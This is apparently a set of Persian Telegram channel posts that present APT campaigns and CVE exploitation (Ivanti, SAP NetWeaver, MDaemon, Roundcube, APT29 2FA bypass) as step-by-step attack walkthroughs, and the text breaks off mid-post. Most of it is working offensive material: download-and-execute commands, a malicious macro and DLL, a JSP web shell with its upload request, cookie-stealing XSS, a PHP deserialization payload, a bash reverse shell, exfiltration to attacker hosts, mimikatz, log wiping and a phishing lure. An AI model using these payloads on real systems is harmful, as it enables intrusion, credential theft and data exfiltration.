⏲ تحلیل فنی حمله Lotus Panda با Sagerunex Backdoor

گروه Lotus Panda یکی از گروه‌های APT چینیه که با استفاده از نسخه‌ آپدیت شده‌ Sagerunex Backdoor به هدف‌هایی تو حوزه‌ دولت، مخابرات و صنایع حساس حمله کرده. این گروه از تکنیک‌های پیشرفته نفوذ، بایپس مکانیزم‌های امنیتی، و افزایش سطح دسترسی تو تارگت بهره می‌بره.

🔹 مرحله 1. شناسایی تارگت و جمع‌آوری اطلاعات اولیه
👈 تکنیک‌های شناسایی اولیه (OSINT)
⬅️ شناسایی دامنه‌ها و ایمیل‌های مرتبط با تارگت

theHarvester -d target.com -l 500 -b google

⬅️ بررسی پورت‌ها و سرویس‌های در حال اجرا

nmap -sS -sV -p- -T4 target.com

⬅️ جستجو برای آسیب‌پذیری‌های احتمالی تو سیستم‌ها

shodan search "port:443 org:TargetOrganization"

🔹 مرحله 2. روش‌های نفوذ اولیه به تارگت
👈 حمله‌ Spear Phishing

Asunto: Actualización de seguridad obligatoria

Estimado usuario,

Hemos detectado una actividad sospechosa en su cuenta. Para verificar su información, descargue el archivo adjunto.

Atentamente,
Soporte Técnico

🔹 مرحله 3. اجرای بدافزار و استقرار Sagerunex
👈 کد PowerShell برای دانلود و اجرای بدافزار:

Invoke-WebRequest -Uri "http://maliciousserver.com/sagerunex.exe" -OutFile "C:\Users\Public\sagerunex.exe"
Start-Process "C:\Users\Public\sagerunex.exe"

🔹 مرحله 4. برقراری ارتباط با سرور C2
👈 کد ارتباط با C2 از طریق Dropbox API

import dropbox

ACCESS_TOKEN = "malicious-access-token"
dbx = dropbox.Dropbox(ACCESS_TOKEN)

def send_data(data):
    dbx.files_upload(data.encode(), "/logs/data.txt")

send_data("Captured keystrokes and files")

🔹 مرحله 5. افزایش سطح دسترسی و حرکت جانبی تو شبکه
👈 الف) افزایش سطح دسترسی با اجرای اکسپلویت‌های Local Privilege Escalation

winPEAS.bat > report.txt

👈 ب) اجرای DLL Hijacking برای افزایش سطح دسترسی
کد ساخت یک DLL مخرب تو C++

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("cmd /c net user hacker P@ssw0rd! /add && net localgroup administrators hacker /add");
    }
    return TRUE;
}

⬅️ کامپایل و ایجاد DLL مخرب:

x86_64-w64-mingw32-gcc -shared -o fake.dll fake.cpp -mwindows

🔹 مرحله 6. استخراج اطلاعات و حذف ردپا
👈 الف) فشرده‌سازی و رمزگذاری داده‌ها برای ارسال به C2

Compress-Archive -Path "C:\sensitive-data" -DestinationPath "C:\data.zip"
certutil -encode "C:\data.zip" "C:\data.b64"

👈 ب) حذف ردپاها و لاگ‌های ویندوز

Remove-Item -Path "C:\Users\Public\sagerunex.exe" -Force
wevtutil cl Security

🔹 راه‌کارهای دفاعی که توسط رضا ارائه شده رو حتما بخونین. جالبه:
https://news.1rj.ru/str/safe_defense/136

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ خبری اومده که حملات سایبری که اخیرا تو ژاپن انجام شده، نشون‌دهنده بهره‌برداری از آسیب‌پذیری زیرودی با شناسه CVE-2025-0282 تو دستگاه‌های Ivanti Connect Secure (ICS) برای توزیع بدافزار جدید به اسم DslogdRAT هست. کخ تو این پست می‌خوایم یکم فنی‌تر این خبر رو باهم بررسی کنیم.

این آسیب‌پذیری یه stack-based buffer overflow تو نسخه‌های قبل از 22.7R2.5 از Ivanti Connect Secureه که به مهاجمای سایبری اجازه می‌ده بدون احراز هویت، کد دلخواه‌شون رو بصورت ریموت اجرا کنن. این نقص تو دسامبر 2024 شناسایی و تو ژانویه 2025 پچ شد، اما قبل از اون تو حملاتی علیه سازمان‌های ژاپنی مورد سوءاستفاده قرار گرفته بود.
​
تحلیل فنی:
🔹 یک. شناسایی هدف (Recon)
اولین قدم اینه که بفهمیم چه سازمان‌هایی هنوز از نسخه‌های آسیب‌پذیر Ivanti Connect Secure (ICS) استفاده می‌کنن. اسکنرهایی مثل Shodan یا Censys برای این کار عالی هستن. با یه فیلتر ساده روی بنرهای SSL یا مسیرهای /dana-na/ راحت سرورهای ICS پیدا میشن.

http.noscript:"Welcome to Ivanti Connect Secure"

🔹 دو. شناسایی آسیب‌پذیری (Enumeration)
وقتی سرورهای هدف پیدا شدن، تست می‌کنیم ببینم نسخه‌ی ICS آسیب‌پذیره یا نه. چون این آسیب‌پذیری یه stack-based buffer overflow توی یکی از کامپوننت‌های مدیریت حافظه‌ی ICS هست، معمولاً با یه درخواست ساده میشه کرش یا رفتار غیرعادی تو سرور ایجاد کرد.

curl -k -X POST https://victim-ics/dana-na/auth/url_default/login.cgi -d "reallylonginput=AAAAAA...."

اگر رفتار عجیبی دیدیم، سرور به احتمال زیاد آسیب‌پذیره.

🔹 سه. اکسپلویت (Exploit)
وقتی مطمئن شدیم سیستم هدف آسیب‌پذیره، باید shell اولیه بگیریم. با توجه به اطلاعات لو رفته، اکثر هکرها از یه Perl Webshell ساده استفاده کردن که روی ICS دیپلوی شده. این Webshell با یک کوکی خاص فعال میشه.
⬅️ ساخت درخواست فعالسازی Webshell:

curl -k --cookie "DSLogdSession=xyz" https://victim-ics/home/webserver/htdocs/dana-na/cc/ccupdate.cgi?cmd=whoami

اگر جواب گرفتیم (مثلاً root یا admin)، یعنی کامل داخل سیستم هستیم.

🔹 چهار. استقرار بدافزار (Post-Exploitation)
حالا نوبت به نصب DslogdRAT می‌رسه که یه رت سبکه که از ارتباط رمزگذاری شده XOR استفاده می‌کنه. این رت فوق‌العاده باهوشه؛ فعالیتش فقط بین ساعات اداری (8 صبح تا 2 بعدازظهر) هست تا وسط شب آلارم ایجاد نکنه.
هش مربوط به این رت:
1dd64c00f061425d484dd67b359ad99df533aa430632c55fa7e7617b55dab6a8
مراحل بعدی:
⬅️ این رت رو از سرور خودمون روی سرور قربانی آپلود می‌کنیم.
⬅️ ارتباط با C2 برقرار میشه.
⬅️ دستورات مستقیم می‌فرستیم یا فایل‌ها رو منتقل می‌کنیم.

🔹 پنج. ماندگاری (Persistence)
برای اینکه دسترسی طولانی داشته باشیم:
⬅️ اسکریپت بوت روی ICS نصب می‌کنیم که با هر ریبوت، Webshell یا DslogdRAT دوباره فعال بشه.
⬅️ همچنین می‌تونیم یه کاربر Admin جعلی درست کنیم که توی لیست کاربرها زیاد تو چشم نیاد.

🔹 شش. حرکت جانبی و حمله‌های بعدی (Lateral Movement)
از ICS به عنوان یک pivot point استفاده می‌کنیم:
⬅️ ارتباط به شبکه داخلی سازمان.
⬅️ سرقت کردنشیال‌های LDAP یا Active Directory.
⬅️ اسکن برای سرورهای دیگر.
⬅️ کاشت بدافزار در شبکه‌های حساس‌تر.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل حمله گروه UNC2428 (وابسته به ایران) علیه اهداف اسرائیلی

تو آوریل ۲۰۲۵ (که امروز آخرین روزش هم هست)، گروهی از هکرهایی که گفته وابسته به ایران هستند با نام UNC2428، یه کمپین پیچیده‌ی مهندسی اجتماعی رو علیه اهداف اسرائیلی اجرا کردن. این عملیات با استفاده از آگهی‌های شغلی جعلی به نام شرکت دفاعی اسرائیلی «رافائل» انجام شده و بدافزاری به نام MURKYTOUR رو توزیع کرده. که تو ادامه می‌خوایم این حمله رو کمی تحلیل کنیم.

🔹 یک. شناسایی اهداف (Reconnaissance)
👈 تکنیک‌های به‌کاررفته:
⬅️ استفاده Passive OSINT از LinkedIn، GitHub، و Telegram
⬅️ غربال‌گری افراد با علایق شغلی فعال (جستجوی کلمات کلیدی مثل “Looking for opportunities”)
⬅️ فیلتر افراد مرتبط با شرکت‌های حساس (مثلاً Rafael Defense Systems)
👈 ابزارهای احتمالی:
⬅️ یک. Maltego، SpiderFoot، recon-ng
⬅️ دو. Custom scrapers (برای LinkedIn و صفحات استخدامی)

🔹 دو. ساخت زیرساخت فیشینگ (Infrastructure)
👈 دامنه جعلی:
⬅️ دامنه rafael-careers[.]com یا مشابه اون
⬅️ ثبت از طریق خدمات ناشناس (Namecheap + Whois Privacy)
👈 طراحی وب‌سایت:
⬅️ شبیه‌سازی دقیق صفحه رسمی شرکت
⬅️ اضافه کردن فرم بارگذاری رزومه (رزومه در واقع نقش trigger برای نصب بدافزار رو ایفا می‌کنه)
👈 گواهی SSL:
⬅️ صادرشده از Let’s Encrypt
⬅️ مرورگر قربانی خطری احساس نمی‌کنه (https فعال)

🔹 سه. طراحی Dropper (LONEFLEET)
👈 نوع فایل:
⬅️ فایل اجرایی ویندوز با اسمی مثل RafaelConnect.exe
⬅️ دولوپ شده با C# یا Visual Basic .NET
👈 رفتار Dropper:
نمایش فرم GUI فیک برای پرکردن اطلاعات شغلی
اجرا شدن ماژول بدافزاری تو بک‌گراند
انجام Persistence از طریق Scheduled Task و Registry: Run
👈 تکنیک‌های ضدتحلیل:
⬅️ بررسی پردازش‌های تحلیل رایج (vboxservice، wireshark، procmon)
⬅️ اجرای تأخیری (Sleep + Interaction Check)
⬅️ تشخیص وجود موس یا کلیک برای جلوگیری از اجرا تو sandbox

🔹 چهار. بدافزار اصلی (MURKYTOUR)
👈 زبان و ساختار:
⬅️ دولوپ شده بر پایه .NET یا C++
⬅️ ساختار ماژولار
👈 عملکردها:
⬅️ اجرای دستورات PowerShell
⬅️ کی‌لاگر و اسکرین‌شات
⬅️ استخراج فایل‌ها و session tokens
⬅️ ایجاد کانال C2 با استفاده از HTTPS جعلی یا DNS tunneling
👈 روش ارتباط با C2:
⬅️ استفاده از دامنه جعلی مانند cdn-sync-update[.]com
⬅️ استفاده از TLS سفارشی یا reverse proxy برای پنهون کردن ترافیک

🔹 پنج. مکانیزم‌های جلوگیری از شناسایی (Evasion Techniques)
⬅️ یک. Obfuscation: فشرده‌سازی و کدگذاری فایل اجرایی (مثلاً با ConfuserEx)
⬅️ دو. AV Bypass: امضای دیجیتال نامعتبر + امتناع از استفاده از APIهای مشکوک
⬅️ سه. Living Off The Land (LOTL): استفاده از ابزارهای داخلی ویندوز (rundll32, powershell, mshta)

🔹 شش. استخراج اطلاعات (Exfiltration)
⬅️ استفاده از HTTPS POST برای ارسال اطلاعات حساس
⬅️ چنل فشرده‌شده با gzip و disguise به عنوان ترافیک وب
⬅️ انتقال فایل‌ها به صورت chunk شده

🔹 هفت. حفظ دسترسی (Persistence)
⬅️ یک. HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateSvc
⬅️ دو. Scheduled Task با نام جعلی: “Windows Defender Scheduler”
⬅️ سه. ایجاد بکدور دوم به صورت PowerShell noscript تو پوشه %AppData%

🔹 هشت. اقدامات ضد تحلیل (OPSEC)
⬅️ ارتباط دوره‌ای با C2، نه دائم
⬅️ استفاده از beacon time تصادفی (Random jitter)
⬅️ حذف خودکار فایل‌های dump و log بعد از نصب

🔹 نه. خطاهای احتمالی مهاجم
⬅️ ارسال فایل اجرایی قابل تحلیل (.exe) بدون لایه dropper دوم می‌تونه تو sandbox بررسی بشه.
⬅️ شباهت دامنه جعلی به دامنه واقعی ممکنه با بررسی DNS یا threat intel شناسایی بشه.
⬅️ استفاده از TLS سلف سیگنیچر تو برخی کانفیگ‌ها می‌تونه ردفلگ باشه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل فنی نفوذ APT1 به Westinghouse Electric Company

گروه APT1 یکی از شناخته‌شده‌ترین گروه‌های هکریه که توسط دولت چین پشتیبانی می‌شه. این گروه توسط گزارش مشهور شرکت Mandiant تو سال ۲۰۱۳ افشا شد و به متهم شد به حملات سایبری متعدد علیه سازمان‌های غربی. یکی از این شرکت‌ها Westinghouse Electric Company بود. دلیل این انتخاب اینه که این شرکت یکی از شرکت‌های کلیدی تو طراحی، ساخت، و راه‌اندازی نیروگاه‌های هسته‌ای تو آمریکاست و همچنین تکنولوژی هسته‌ای به کشورهای دیگر (مثل کره جنوبی و ژاپن) صادر می‌کرد. درحقیقت اومدن این شرکت رو هک کردن تا بتونن به اسناد تجاری و تکنولوژی این شرکت دست پیدا کنن. خب می‌ریم سروقت تحلیل‌مون:

🔹 فاز نفوذ اولیه (Initial Access)
👈 تکنیک مورد استفاده: Spear Phishing هدفمند با فایل‌های آفیس (Word/Excel) حاوی ماکرو مخرب
محتوای فایل:
⬅️ فایل Word با عنوان گول‌زننده مثل: Project_Timeline_Q3_Confidential.doc
⬅️ فعال‌سازی ماکرو با پیام: “Enable Content to view document”
⬅️ کد VBA برای Drop و اجرای Payload
نمونه کد ماکرو VBA:

Sub AutoOpen()
  Dim objShell As Object
  Set objShell = CreateObject("WScript.Shell")
  objShell.Run "powershell -w hidden -nop -c IEX(New-Object Net.WebClient).DownloadString('http://203.81.99.37/payload.ps1')"
End Sub

👈 تحلیل:
⬅️ یک. -w hidden: اجرای مخفی PowerShell
⬅️ دو. -nop -c: حذف history و اجرای مستقیم
⬅️ سه. دانلود و اجرای فایل رمزگذاری‌شده از C2

🔹 نصب بکدور و حفظ دسترسی (Establish Foothold)
👈 ابزار: WEBC2 (APT1 toolset)
⬅️ یک. تروجان HTTP-based برای اتصال به سرور فرماندهی (C2)
⬅️ دو. دراپ به مسیر‌هایی مثل: C:\Users\Public\chrome_upd.exe
👈 مشخصات فایل دراپر:
⬅️ یک. Obfuscated with UPX or custom packer
⬅️ دو. C2 address hardcoded or DNS-resolved from DGA
نمونه رفتار فرآیند:

Start-Process -FilePath "chrome_upd.exe" -ArgumentList "/silent /task:sync" -WindowStyle Hidden

👈 ترافیک شبکه:
⬅️ یک. POST request every 30s to http://updater[.]info/report.php
⬅️ دو. Beacon: Base64-encoded system fingerprint

🔹 حرکت جانبی (Lateral Movement)
👈 ابزار: PsExec + Mimikatz
Mimikatz:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

PsExec:
psexec.exe \\TARGET -u admin -p password cmd.exe

🔹 جستجو و استخراج اطلاعات (Data Collection & Exfiltration)
👈 ابزار: اسکریپت‌های سفارشی PowerShell + RAR
نمونه اسکریپت:

$files = Get-ChildItem -Recurse -Path "C:\Engineering\ReactorDesigns\" -Include *.docx,*.pdf,*.dwg
Compress-Archive -Path $files.FullName -DestinationPath "C:\Temp\export.zip"
Invoke-WebRequest -Uri "http://203.81.99.37/upload" -Method POST -InFile "C:\Temp\export.zip"

🔹 حذف ردپا و حفظ حضور (OPSEC & Persistence)
👈 تکنیک‌ها:
⬅️ ایجاد Scheduled Task با نام جعلی:

schtasks /create /tn "Chrome Update" /tr "C:\Users\Public\chrome_upd.exe" /sc minute /mo 30

⬅️ پاک‌کردن لاگ‌های سیستم:

wevtutil cl Security

⬅️ حذف فایل‌های لاگ دراپر:

del /F /Q "C:\Users\*\AppData\Local\Temp\~*.log"

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ گروه مرتبطی با چین با اسم Chaya_004 از آسیب‌پذیری بحرانی CVE-2025-31324 تو SAP NetWeaver سوءاستفاده کرده‌. این آسیب‌پذیری تو ماژول Visual Composer و به طور خاص تو سرویس MetadataUploader با مسیر /developmentserver/metadatauploader قرار داره. این سرویس قراره فایل متادیتا رو برای توسعه‌دهنده‌ها آپلود کنه. اما SAP یه اشتباه مرگبار کرده: این endpoint بدون هیچ نوع authentication بازه!
این endpoint به راحتی فایل‌ رو با متد POST دریافت و روی سیستم ذخیره می‌کنه، بدون بررسی اینکه کاربر کیه. حالا اگه فایل آپلودی یه اسکریپت .jsp باشه، SAP NetWeaver اون رو به عنوان یه asset داینامیک لود می‌کنه و روی سرور اجرا می‌کنه!

👈 یعنی چی؟ یعنی:

POST /developmentserver/metadatauploader HTTP/1.1
Host: target-victim.com
Content-Type: multipart/form-data; boundary=boundary

--boundary
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
--boundary--

👈 بعدش فقط کافیه بری:

http://target-victim.com/VCService/shell.jsp?cmd=whoami

و تمام! کد روی سرور اجرا می‌شه.

🔹 مرحله دوم: پیاده‌سازی دقیق - Exploit Chain
👈 گام 1: Uploading JSP Web Shell

curl -X POST http://victim.com/developmentserver/metadatauploader \
  -F "file=@shell.jsp" -H "Content-Type: multipart/form-data"

محتوای shell.jsp:

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
Process p = Runtime.getRuntime().exec(cmd);
BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
while ((line = reader.readLine()) != null) {
    out.println(line);
}
%>

👈 گام 2: اجرای کد از راه دور

curl "http://victim.com/VCService/shell.jsp?cmd=cat /etc/passwd"

🔹 مرحله سوم: Persistence با SuperShell
بعد از اکسپلویت چی نصب کردن؟ یه reverse shell به سبک GoLang به اسم SuperShell. این ابزار مثل Cobalt Strike ولی سبک‌تر و stealthتره.
👈 ویژگی‌های جالب SuperShell:
⬅️ یک. Cross-platform (Linux/Windows)
⬅️ دو. TLS encrypted reverse shell
⬅️ سه. فایل single-binary، قابل بارگذاری از طریق همین RCE
⬅️ چهار. با قابلیت اجرای دستور، TTY interactive، فایل آپلود و دانلود
👈 شِل رو چطوری نصب کردن؟
فایل .jsp یه curl یا wget ساده میزنه به سرور CDNشون و فایل Golang shell رو دانلود می‌کنه:

<%
String[] cmd = {"/bin/sh", "-c", "wget http://malicious.cn/supershell -O /tmp/sshell; chmod +x /tmp/sshell; /tmp/sshell &"};
Runtime.getRuntime().exec(cmd);
%>

🔹 زیرساخت و C2 Network
هکرها فقط یه RCE ساده نزدن، کل ساختار حمله شبیه یه kill-chain پیشرفته‌ست:
⬅️ یک. Recon: ابزارهایی مثل ARL و Pocassist برای پیدا کردن سیستم‌های SAP آسیب‌پذیر
⬅️ دو. Exploit: استفاده از CVE-2025-31324 با اسکریپت curl/python
⬅️ سه. Payload: بارگذاری SuperShell via .jsp
⬅️ چهار. C2: Tunnel کردن ترافیک از طریق SoftEther VPN و NPS (یه reverse proxy چینی)
⬅️ پنج. Persistence: ابزارهایی مثل Go Simple Tunnel یا Cobalt Strike برای backdoorهای پایدار
⬅️ شش. Evade: رمزنگاری ارتباط، تغییر مسیر DNS، و فایل‌های اسمی نامفهوم مثل ssonkfrd.jsp

🔹 تحلیل نهایی: چرا این حمله خاصه؟
⬅️ یک. Zero Auth RCE روی یک ERP حیاتی مثل SAP یعنی نفوذ به قلب سازمان.
⬅️ دو. حمله کاملاً قابل اتوماسیون با ابزارهای PoC آماده‌ست.
⬅️ سه. Golang payloads مثل SuperShell باعث میشن آنتی‌ویروس‌ها گیج بشن؛ چون فایل باینری ناشناخته‌ست.
⬅️ چهار. استفاده از ابزارهای open-source و چینی باعث میشه شناسایی APT سخت‌تر بشه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ گزارش عملیاتی – Exploiting CVE-2024-11182 in MDaemon Webmail
🧊 نفوذ به زیرساخت‌های دولتی با سوءاستفاده از یک Zero-Day در MDaemon

🔹 شناسایی قربانی
👈 ما به دنبال اهدافی در حوزه حاکمیتی (Government & Defense) بودیم که همچنان از زیرساخت‌های قدیمی وب‌میل استفاده می‌کنند. ابزارهای Recon مورد استفاده:
Shodan + Censys:

shodan search 'http.noscript:"MDaemon Webmail"' country:"RO"

👈 تأیید با whatweb و nmap:

whatweb http://mail.target.gov.ro
nmap -sV -p 3000-9000 mail.target.gov.ro

نتایج نشان داد که چندین هدف در اوکراین، رومانی و قبرس از نسخه‌های آسیب‌پذیر MDaemon Webmail استفاده می‌کنند (نسخه‌های قبل از 24.5.1).

🔹 تحلیل آسیب‌پذیری زیرودی CVE-2024-11182
آسیب‌پذیری XSS Reflected در پارامترهای سمت کلاینت در فرم پاسخ‌دهی ایمیل:
👈 پارامتر آسیب‌پذیر:

POST /WorldClient.dll?View=Compose&Action=ReplyTo
Content-Type: application/x-www-form-urlencoded

body=<img src=x onerror="fetch('https://attacker.com/x?'+document.cookie)">

هنگام مشاهده پاسخ ایمیل توسط کاربر، کد JS اجرا می‌شود. اجرای کد در context دامنه MDaemon باعث سرقت session cookie و دسترسی به اینترفیس وب‌میل می‌شود.

🔹 آماده‌سازی حمله - Weaponization
👈 ایجاد ابزار JavaScript payload generator:

let payload = `
fetch('https://c2-server.evil/steal', {
  method: 'POST',
  body: JSON.stringify({
    cookies: document.cookie,
    ua: navigator.userAgent,
    loc: window.location.href
  })
});
`;

👈 محتوا را در ایمیل HTML اینجکت کردیم:

<img src=x onerror="${payload}">

🔹 ارسال ایمیل - Delivery
👈 ارسال از دامنه جعلی شبیه وزارت کشور:

spoof-mail.py --from 'gov@ministry.gov.ua' --to 'employee@target.gov.ro' \
--subject 'وضعیت اضطراری ملی' --html-file payload.html

ایمیل‌ها از طریق SMTP سرور open relay در آفریقا ارسال شدند. از محتوای فریبنده با عنوان "یادداشت امنیت ملی فوری" استفاده کردیم.

🔹 اجرای موفق کد مخرب - Exploitation
👈 با باز شدن ایمیل، کوکی‌های قربانی به C2 ما ارسال شدند:

Cookie: auth_session=dkj34k2j4k2j34k23j4
User-Agent: Mozilla/5.0 (Windows NT 10.0)

👈 از آنجا وارد پنل Webmail شدیم:

curl -b "auth_session=..." https://mail.target.gov.ro/WorldClient.dll?View=Inbox

🔹 استخراج داده‌های حساس - Credential Extraction
👈 لیست ایمیل‌ها، credentials و 2FA tokenها در فایل‌های قابل مشاهده سمت سرور ذخیره شده بودند:

GET /WorldClient.dll?View=Settings&Folder=Passwords
GET /WorldClient.dll?View=2FA&Export

👈 استخراج تنظیمات SMTP/IMAP برای pivot:

SMTP Host: smtp.target.gov.ro
IMAP User: admin@target.gov.ro
IMAP Pass: ********

🔹 ماندگاری در سیستم - Persistence
👈 ایجاد App Password مخفی (ویژگی MDaemon برای دسترسی API):

POST /WorldClient.dll?View=AppPassword&Create
Body: name=devtool&pass=VeryLongAppToken123

ذخیره Token در vault تیم مهاجم برای بازگشت در آینده.

🔹 زیرساخت C2
👈 سرور C2 بر بستر Cloudflare Tunnel تنظیم شد.
👈 دامنه: update-drive-storage[.]net
👈 ترافیک ارسالی به شکل encoded JSON over HTTPS:

{ "cookies": "...", "2fa": "...", "imap": "...", "metadata": "..." }

🔹 ابزارهای استفاده‌شده:
✅ Recon: Shodan, WhatWeb, Nmap
✅ Delivery: SpoofMail.py, Phishery
✅ Exploit: Custom JS Payload
✅ Persistence: AppToken Abuse, Cookie Hijack
✅ Extraction: CURL, Python IMAP Tool
✅ Infra: Cloudflare Tunnel, DNS Over HTTPS (DoH)

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

⏲ تحلیل آسیب‌پذیری CVE-2025-49113
🧊 یه آسیب‌پذیری بحرانی تو Roundcube Webmailاه که به هکرها بعد از احراز هویت امکان اجرای کد از راه دور (RCE) روی سرور رو می‌ده. تو ادامه جزئیات اون رو بررسی می‌کنیم.

🔹 هدف:
سروری با Roundcube Webmail (مثلاً نسخه 1.6.9) که دارای حساب‌های کاربری معتبر و دسترسی از طریق اینترنت است.

🔹 مرحله 1: شناسایی هدف
👈ابزار: nmap, httpx, whatweb, wappalyzer, dirsearch.
👈خروجی:

$ whatweb mail.victim.com
mail.victim.com [200 OK] Roundcube, PHP, Apache, Country[US], Title[Welcome to Roundcube Webmail]

$ curl https://mail.victim.com/roundcube/ | grep Version
<meta name="generator" content="Roundcube Webmail 1.6.9">

🔹 مرحله 2: دستیابی به حساب کاربری
از اونجایی که آسیب‌پذیری بعد از احراز هویت عمل می‌کنه، نیاز به یه حساب داریم:
⬅️ یک. Credential stuffing با پسوردهای لو رفته
⬅️ دو. Social engineering برای گرفتن دسترسی کاربر
⬅️ سه. استفاده از credential leak سازمانی

Username: john@victim.com
Password: Company2023!

👈 ورود موفق از طریق /roundcube/?_task=login

🔹 مرحله 3: بهره‌برداری از CVE-2025-49113
👈 فایل upload.php تو مسیر:

/program/actions/settings/upload.php

پذیرای پارامتر POST به اسم _fromاه که بدون اعتبارسنجی deserialize می‌شه. ما با ساخت یه آبجکت PHP مخرب، کد دلخواه رو روی سرور اجرا می‌کنیم.

🔹 مرحله 4: ساخت payload PHP Object Injection
👈 سناریو: Roundcube از لایبرری‌هایی مثل PEAR یا Symfony بهره می‌گیره، و خیلی از کلاس‌های اون قابلیت magic method مثل __destruct()، __wakeup() یا __toString() دارن.

class Exploit {
    public $cmd;

    function __destruct() {
        system($this->cmd);
    }
}

$exploit = new Exploit();
$exploit->cmd = "curl http://attacker.com/shell.sh | bash";
$serialized = serialize($exploit);

👈 مثال خروجی:

O:7:"Exploit":1:{s:3:"cmd";s:33:"curl http://attacker.com/shell.sh | bash";}

🔹 مرحله 5: ارسال درخواست مخرب

POST /roundcube/?_task=settings&_action=upload HTTP/1.1
Host: mail.victim.com
Cookie: roundcube_sessid=SESSIONID

Content-Type: multipart/form-data; boundary=----XYZ
Content-Length: ...

------XYZ
Content-Disposition: form-data; name="_from"

O:7:"Exploit":1:{s:3:"cmd";s:40:"wget http://attacker.com/rev.sh -O- | bash";}
------XYZ
Content-Disposition: form-data; name="userfile"; filename="fake.txt"
Content-Type: text/plain

(fake content)
------XYZ--

🔹 مرحله 6: Reverse Shell
👈 فایل rev.sh محتوای زیرو داره:

#!/bin/bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1

👈 تو سمت مهاجم:

nc -lvnp 4444

🔹 مرحله 7: Post Exploitation
⬅️ کارهایی که حالا می‌شه انجام داد:
⬅️ سرقت فایل‌های ایمیل کاربرا از /var/lib/roundcube/
⬅️ خوندن فایل‌های پیکربندی حاوی DB creds (config/config.inc.php)
⬅️ پیوت به سیستم‌عامل با privilege escalation
⬅️ نصب backdoor دائمی

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
⏩ @CyberWarfar

#پادکست
🎤 اپیزود 88 رادیو امنیت - صدایی از تاریکی: ماجرای گنجشک درنده - یازدهم تیر 1404
💠 بررسی حمله سایبری به بانک سپه

⬅️ لینک CastBox
https://castbox.fm/vd/823884810

⏩ CyberWarfar

⏲ خبری اومد که گروه APT29 یا همون Cozy Bear که وابسته به سازمان اطلاعات خارجی روسیه‌اس، از روش‌های خیلی پیچیده برای دور زدن احراز هویت دومرحله‌ای استفاده کرده و تونسته به حساب جیمیل افراد تارگت دسترسی پیدا کنه. اینجا می‌خوام این خبر رو از دید فنی بررسی کنیم:

🧊 جزئیات فنی کمپین APT29 برای دور زدن 2FA
👈 هدف اصلی:
حساب‌های جیمیل کارمندای نهادهای دولتی، دیپلمات‌ها، مؤسسات تحقیقاتی، و اهداف استراتژیک تو کشورهای غربی، به‌ویژه تو آمریکا و اتحادیه اروپا.
👈 روش حمله:
گروه APT29 با ارسال ایمیل‌های فیشینگ هدفمند، قربانی رو به صفحاتی فیک هدایت می‌کنه که شباهت زیادی به صفحات لاگین واقعی گوگل دارن. اما نکته کلیدی اینجاست: حتی اگه قربانی احراز هویت دو مرحله‌ای (مثلاً کد SMS یا اپلیکیشن احراز هویت) رو وارد کنه، مهاجم همچنان می‌تونه دسترسی کامل بگیره.
👈 استفاده از App Passwords برای دور زدن 2FA:
گوگل به کاربرا اجازه می‌ده برای اپلیکیشن‌هایی که از احراز هویت دو مرحله‌ای پشتیبانی نمی‌کنن، یه "رمز عبور اپلیکیشن" (App Password) تولید کنن. این رمز، یک‌بار مصرفه و نیازی به وارد کردن کد 2FA نداره.

🧊 تحلیل فنی کمپین APT29
🔹 سناریو کلی
👈 هدف: دستیابی به حساب‌های جیمیل کارکنای دولتی، دیپلمات‌ها، محققان و اعضای نهادهای استراتژیک
👈 تکنیک کلیدی: فیشینگ هدفمند + session hijacking یا credential harvesting + تولید App Password پس از ورود موفق

🔹 مرحله 1: شناسایی هدف
👈 ابزارها:
⬅️ یک. Maltego / SpiderFoot برای جمع‌آوری اطلاعات سازمانی
⬅️ دو. LinkedIn Scraping (ابزارهایی مثل osintLinkedinScraper) برای شناسایی نقش‌ها و ایمیل‌های هدف
⬅️ سه. Hunter.io / Email Permutator برای ساختن لیست ایمیل‌ها
👈 تکنیک‌ها:
⬅️ جمع‌آوری دامنه‌های مورد استفاده سازمان
⬅️ استخراج MX Recordها برای بررسی استفاده از Google Workspace
⬅️ پیدا کردن آدرس‌های ایمیل مرتبط با افراد مهم سازمان

🔹 مرحله 2: ایجاد زیرساخت
👈 ابزارها:
⬅️ یک. C2 Frameworks: Cobalt Strike / Sliver / Mythic برای Post-Exploitation
⬅️ دو. Phishing Kits: Evilginx2 / Modlishka / Muraena برای حملات MITM روی صفحات لاگین گوگل
👈 نکات کلیدی:
⬅️ استفاده از دامنه‌هایی مشابه دامنه اصلی سازمان (typosquatting)
⬅️ تنظیم HTTPS با Let's Encrypt برای اعتبار ظاهری
⬅️ راه‌اندازی Reverse Proxy با Evilginx2 برای جمع‌آوری real-time session cookies

🔹 مرحله 3: اجرای حمله فیشینگ
👈 تکنیک‌ها:
⬅️ ارسال ایمیل از طریق سرورهای SPF/DMARC معتبر یا compromise شده برای دور زدن فیلترها
⬅️ استفاده از محتوای فیشینگ شخصی‌سازی‌شده (مثلاً: درخواست آپدیت رمز عبور، اطلاعیه امنیتی از طرف گوگل)
👈 ابزار ارسال:
⬅️ یک. GoPhish
⬅️ دو. King Phisher
👈 هدف:
⬅️ تارگت وارد صفحه جعلی بشه، رمز و 2FA Token خودش رو وارد کنه. Evilginx2 این اطلاعات رو تو لحظه ثبت می‌کنه و از اون برای لاگین واقعی استفاده می‌کنه.

🔹 مرحله 4: دور زدن 2FA و ایجاد App Password
